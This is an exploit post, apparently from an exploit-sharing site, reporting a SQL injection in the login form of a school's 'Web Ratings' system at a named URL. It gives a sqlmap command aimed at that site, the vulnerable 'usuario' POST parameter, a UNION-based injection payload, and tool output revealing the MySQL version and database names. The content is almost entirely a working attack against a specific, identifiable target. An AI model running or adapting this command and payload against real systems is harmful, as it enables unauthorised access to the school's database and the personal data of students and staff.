# Exploit Title: Santo Domingo School (CSD) / Web Ratings | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "http://csd.atenas.tech/login.html" --form --dbs --batch
---------------------------------------------------------------------------------------------------
Santo Domingo School (CSD)
Web Ratings
http://csd.atenas.tech/login.html
---
Parameter: usuario (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: usuario=rXpi' UNION ALL SELECT NULL,NULL,CONCAT(CONCAT('qxqxq','mGxiNZtQyMjBiWOgBcfVyIGbwYfYUFiMVrIPuAox'),'qpjxq'),NULL,NULL,NULL-- GxFw&clave=&recuerdame=on
---
the back-end DBMS is MySQL
web application technology: PHP, Apache
the back-end DBMS: MySQL 5 (Percona fork)
banner: '5.6.41-84.1'
available databases [2]:
[+] atenaste_csd
[+] information_schema